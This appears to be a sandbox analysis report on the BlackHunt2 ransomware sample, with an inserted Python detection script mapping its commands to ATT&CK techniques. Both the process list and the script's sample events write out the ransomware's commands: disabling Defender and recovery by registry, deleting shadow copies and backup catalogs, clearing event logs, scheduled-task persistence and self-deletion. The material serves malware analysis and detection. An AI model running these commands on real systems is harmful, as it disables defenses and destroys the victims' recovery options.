Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1100 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\Conhost.exe
PID 1100 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\Conhost.exe
PID 1100 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\Conhost.exe
PID 1100 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\Conhost.exe
PID 1100 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 3036 wrote to memory of 4592 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe
PID 3036 wrote to memory of 4592 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 3004 wrote to memory of 4472 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3004 wrote to memory of 4472 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1824 wrote to memory of 2476 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Conhost.exe
PID 1824 wrote to memory of 2476 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Conhost.exe
PID 1100 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 4336 wrote to memory of 4024 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4336 wrote to memory of 4024 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4776 wrote to memory of 2168 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4776 wrote to memory of 2168 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1100 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1616 wrote to memory of 2056 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1616 wrote to memory of 2056 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2356 wrote to memory of 3276 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2356 wrote to memory of 3276 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1944 wrote to memory of 4084 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1944 wrote to memory of 4084 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1100 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2272 wrote to memory of 5068 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1100 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2272 wrote to memory of 5068 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1100 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1676 wrote to memory of 1452 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1676 wrote to memory of 1452 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2328 wrote to memory of 1516 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2328 wrote to memory of 1516 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1100 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 5108 wrote to memory of 3104 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 5108 wrote to memory of 3104 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3232 wrote to memory of 4000 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3232 wrote to memory of 4000 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1100 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 1100 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2952 wrote to memory of 400 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2952 wrote to memory of 400 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware
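The signatures above are the sandbox's summary; the Processes list that follows shows the raw commands behind them (vssadmin, bcdedit, wbadmin, fsutil, wevtutil, schtasks and reg.exe, each launched through a throw-away cmd.exe /c wrapper by the sample). As an added example that is not part of this report, the Python below maps process-creation command lines of that kind (Sysmon Event ID 1 or Security 4688 style) to the ATT&CK techniques they exercise, attributes each hit to the parent that drove the wrapper, and alerts only when one parent accumulates several distinct techniques inside a short window, which is what separates an encryptor from an administrator running a single vssadmin. The sample events are constructed from this report's own command lines with invented timestamps and PIDs and a hypothetical benign parent; the patterns, window and threshold are mine.

```python
import re
from collections import defaultdict

# (ATT&CK technique, label, pattern over the whole command line). Matching is case-insensitive
# and the ".exe" suffix is optional because the report shows both "vssadmin" and "vssadmin.exe".
RULES = [
    ("T1490", "delete shadow copies",
     r'\bvssadmin(?:\.exe)?\s+delete\s+shadows\b'),
    ("T1490", "resize shadow storage (legitimate alone; weight comes from correlation)",
     r'\bvssadmin(?:\.exe)?\s+resize\s+shadowstorage\b'),
    ("T1490", "disable recovery environment / ignore boot failures",
     r'\bbcdedit(?:\.exe)?\s+/set\s+\{default\}\s+(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b'),
    ("T1490", "delete backup catalog",
     r'\bwbadmin(?:\.exe)?\s+delete\s+catalog\b'),
    ("T1490", "delete USN change journal",
     r'\bfsutil(?:\.exe)?\s+usn\s+deletejournal\b'),
    ("T1490", "disable the System Restore scheduled task",
     r'\bschtasks(?:\.exe)?\s+/change\s+/tn\s+"?\\microsoft\\windows\\systemrestore\\sr"?\s+/disable\b'),
    ("T1070.001", "clear a Windows event log",
     r'\bwevtutil(?:\.exe)?\s+cl\s+\S+'),
    ("T1562.001", "set a Windows Defender policy value",
     r'\breg(?:\.exe)?\s+add\s+"?hk(?:lm|ey_local_machine)\\software\\policies\\microsoft\\windows defender'),
    ("T1112", "disable System Restore / WinRE / Backup UI by policy",
     r'\breg(?:\.exe)?\s+add\s+"?hk(?:lm|ey_local_machine)\\software\\policies\\microsoft\\windows(?: nt)?\\(?:systemrestore|winre|backup\\client)"?\s+/v'),
    ("T1112", "lock down the interactive session (Task Manager, Run, logoff, lock)",
     r'\breg(?:\.exe)?\s+add\s+"?hk(?:cu|ey_current_user)\\software\\microsoft\\windows\\currentversion\\policies\\(?:system|explorer)"?\s+/v\s+"?(?:disabletaskmgr|norun|noclose|nologoff|disablelockworkstation|disablechangepassword|startmenulogoff)\b.*?/d\s+1\b'),
    ("T1053.005", "scheduled task as SYSTEM at boot",
     r'\bschtasks(?:\.exe)?\s+/create\b.*?/ru\s+"?nt authority\\system"?.*?/sc\s+onstart\b'),
    ("T1547.001", "HKLM Run key entry",
     r'\breg(?:\.exe)?\s+add\s+"?hk(?:lm|ey_local_machine)\\software\\microsoft\\windows\\currentversion\\run"?\s+/v'),
    ("T1070.004", "self-deletion via ping delay and del",
     r'\bping\s+127\.0\.0\.1\b.*?&\s*del\s+'),
]
COMPILED = [(tid, label, re.compile(rx, re.I)) for tid, label, rx in RULES]


def classify(cmdline):
    """Sorted list of (technique, label) pairs whose pattern fires on one command line."""
    return sorted({(tid, label) for tid, label, rx in COMPILED if rx.search(cmdline)})


def correlate(events, window=120, min_techniques=3):
    """events: dicts with ts (seconds), pid, ppid, cmdline. Hits are attributed to the parent
    (ppid) because every tool here ran through a throw-away "cmd.exe /c" wrapper. A parent is
    alerted on when it reaches min_techniques distinct technique ids within `window` seconds.
    Returns {ppid: [(ts, technique, label), ...]} for alerted parents only."""
    hits = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        for tid, label in classify(ev["cmdline"]):
            hits[ev["ppid"]].append((ev["ts"], tid, label))
    alerts = {}
    for ppid, rows in hits.items():
        for i, (t0, _, _) in enumerate(rows):
            in_window = [r for r in rows[i:] if r[0] - t0 <= window]
            if len({r[1] for r in in_window}) >= min_techniques:
                alerts[ppid] = rows
                break
    return alerts


def _ev(ts, pid, ppid, cmdline):
    return {"ts": ts, "pid": pid, "ppid": ppid, "cmdline": cmdline}


# Constructed sample: command lines copied from this report's Processes list, with invented
# timestamps and PIDs under parent 1100 (BlackHunt2.exe) and a hypothetical benign parent 4321.
SAMPLE_EVENTS = [
    _ev(100, 3004, 1100, r'"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f'),
    _ev(101, 1944, 1100, r'"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f'),
    _ev(102, 1676, 1100, r'"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f'),
    _ev(104, 2272, 1100, r'"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F'),
    _ev(110, 5108, 1100, r'"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet'),
    _ev(111, 3232, 1100, r'"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No'),
    _ev(112, 2952, 1100, r'"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet'),
    _ev(115, 3564, 1100, r'"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false'),
    _ev(130, 3584, 1100, r'"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"'),
    _ev(105, 777, 4321, r'"C:\Windows\System32\cmd.exe" /c vssadmin list shadows'),
    _ev(106, 778, 4321, r'"C:\Windows\System32\cmd.exe" /c wevtutil qe Security /c:5'),
]

if __name__ == "__main__":
    for ppid, rows in correlate(SAMPLE_EVENTS).items():
        techs = sorted({r[1] for r in rows})
        print(f"parent {ppid}: {len(rows)} hits, techniques {techs}")
```

Two points worth keeping in mind when lifting this into a real rule set: the sandbox ran the sample as an administrator, so every command here succeeded silently, whereas on a hardened host the same wrapper spawns still appear in process telemetry even when vssadmin or bcdedit fail, which is exactly why the detection keys on the command line rather than on the outcome; and the interesting pivot is the parent of the cmd.exe wrappers, not the wrappers themselves, since each one lives for a fraction of a second.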

Processes

C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe

"C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB

C:\Windows\system32\schtasks.exe

SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded

